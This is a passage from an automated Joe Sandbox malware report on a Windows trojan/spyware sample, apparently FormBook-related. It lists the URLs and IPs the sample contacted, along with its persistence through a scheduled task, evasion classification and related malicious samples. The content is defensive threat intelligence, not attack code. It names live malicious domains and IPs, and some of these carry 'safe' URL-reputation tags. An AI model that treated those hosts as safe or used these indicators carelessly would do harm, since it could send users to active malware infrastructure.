                                                  http://www.6822662.xyz/Dating/149c599845.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/jiuzhonghuannai/1/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/Dating/524e57698899.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/macangyou/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/changzezi/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/uploads/images/1890970.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/Dating/31b57699392.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/baishimolinair/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/yasendi/aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/uploads/images/8182900.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6822662.xyz/Dating/343e599651.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMN1qo2qaJmEvXDP.exe, 00000000.00000002.2418207809.0000000002641000.00000004.00000800.00020000.00000000.sdmp, MN1qo2qaJmEvXDP.exe, 00000000.00000002.2418207809.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, rlJvZXSinaRi.exe, 0000000B.00000002.2563827144.0000000003101000.00000004.00000800.00020000.00000000.sdmp, rlJvZXSinaRi.exe, 0000000B.00000002.2563827144.00000000031B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.6822662.xyz/xiqijiexika/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.6822662.xyz/jiuzhonghuannai/2/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.6822662.xyz/Dating/898f57698525.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.6822662.xyz/Dating/072d399924.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.6822662.xyz/Dating/233e199765.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.6822662.xyz/jiuzhonghuannai/7/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.6822662.xyz/Dating/239f57699184.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.6822662.xyz/zuozuomumingxib/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.6822662.xyz/uploads/images/2328450.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.6822662.xyz/fengxiangnaiya/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.6822662.xyz/tianshimeng/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.6822662.xyz/Dating/484e57698939.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.6822662.xyz/uploads/images/1214150.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.6822662.xyz/xidaoailiw/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.6822662.xyz/aiyinmaliya/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.learnnow.infoaDvThgRLSEMTIq.exe, 00000014.00000002.4781780276.000000000248C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.6822662.xyz/daqiaoweijiu/aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.6822662.xyz/taonaimuxiangnai/aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.6822662.xyz/uploads/images/8825750.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.ecosia.org/newtab/systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.6822662.xyz/jiuzhonghuannai/10/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/tianhaiyi/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/Dating/188b57699235.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/Dating/077b57699346.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/zuozuomumingxi/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/diya/aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/Dating/273e57699150.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/uploads/images/7283490.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/Dating/831c57698592.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/jiuzhonghuannai/8/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/uploads/images/5809920.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/Dating/598f57698825.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/uploads/images/2195710.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/uploads/images/4265400.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/lingcunailid/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/uploads/images/303150.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://hayaniya.org/yf1h/?Ebfx6=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZMsystray.exe, 00000013.00000002.4782860137.000000000596A000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.000000000323A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/sitemap.xmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/uploads/images/5433670.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/Dating/324c57699099.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/jiuzhonghuannai/5/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/kuisia/aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.6822662.xyz/Dating/489a199509.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.elderscrolls.com/skyrim/characterTMN1qo2qaJmEvXDP.exe, rlJvZXSinaRi.exe.0.drfalse
                                                            		high
                                                            http://www.6822662.xyz/uploads/images/7650520.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/Dating/738e57698685.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/jiuzhonghuannai/6/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/Dating/521f499474.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.6822662.xyz/uploads/images/3560300.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refersystray.exe, 00000013.00000002.4782860137.0000000005646000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000002F16000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://www.6822662.xyz/Dating/508a57698915.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.6822662.xyz/chaomeihuixiang/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.6822662.xyz/yuantianmeiyingh/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.elderscrolls.com/skyrim/playerrlJvZXSinaRi.exe, 0000000B.00000002.2563827144.0000000003101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                162.0.215.33
                                                                		nieuws-july202488.sbsCanada
                                                                		35893ACPCAtrue
                                                                104.18.73.116
                                                                		www.losmason.shopUnited States
                                                                		13335CLOUDFLARENETUStrue
                                                                104.21.38.113
                                                                		www.zrinorem-srumimit.sbsUnited States
                                                                		13335CLOUDFLARENETUStrue
                                                                121.43.155.35
                                                                		www.lingdianyun29.xyzChina
                                                                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                13.248.169.48
                                                                		www.lovel.shopUnited States
                                                                		16509AMAZON-02UStrue
                                                                192.185.147.100
                                                                		hayaniya.orgUnited States
                                                                		26337OIS1UStrue
                                                                199.192.23.123
                                                                		www.learnnow.infoUnited States
                                                                		22612NAMECHEAP-NETUStrue
                                                                185.106.208.3
                                                                		holytur.netTurkey
                                                                		42846GUZELHOSTINGGNETINTERNETTELEKOMUNIKASYONASTRfalse
                                                                103.249.106.91
                                                                		www.6822662.xyzChina
                                                                		137443ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKtrue
                                                                3.33.130.190
                                                                		duskgazes.workUnited States
                                                                		8987AMAZONEXPANSIONGBtrue

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1571280
                                                                Start date and time:2024-12-09 08:41:37 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 12m 36s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:22
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:2
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:MN1qo2qaJmEvXDP.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@25/14@12/10
                                                                EGA Information:
                                                                • Successful, ratio: 83.3%
                                                                HCA Information:
                                                                • Successful, ratio: 93%
                                                                • Number of executed functions: 129
                                                                • Number of non-executed functions: 323
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                02:42:32API Interceptor1x Sleep call for process: MN1qo2qaJmEvXDP.exe modified
                                                                02:42:39API Interceptor53x Sleep call for process: powershell.exe modified
                                                                02:42:46API Interceptor1x Sleep call for process: rlJvZXSinaRi.exe modified
                                                                02:43:39API Interceptor10321815x Sleep call for process: systray.exe modified
                                                                08:42:41Task SchedulerRun new task: rlJvZXSinaRi path: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                162.0.215.33Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • www.nieuws-july202488.sbs/30le/
                                                                dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                • www.nieuws-july202541.sbs/0bvv/
                                                                QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                • www.nieuws-july202491.sbs/4bpc/
                                                                r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                                • www.nieuws-july202491.sbs/rq5n/
                                                                rInvoiceCM60916_xlx.exeGet hashmaliciousFormBookBrowse
                                                                • www.nieuws-july202491.sbs/rq5n/
                                                                z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                                • www.nieuws-july202491.sbs/rq5n/
                                                                104.18.73.116Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • www.losmason.shop/s15n/
                                                                santi.exeGet hashmaliciousFormBookBrowse
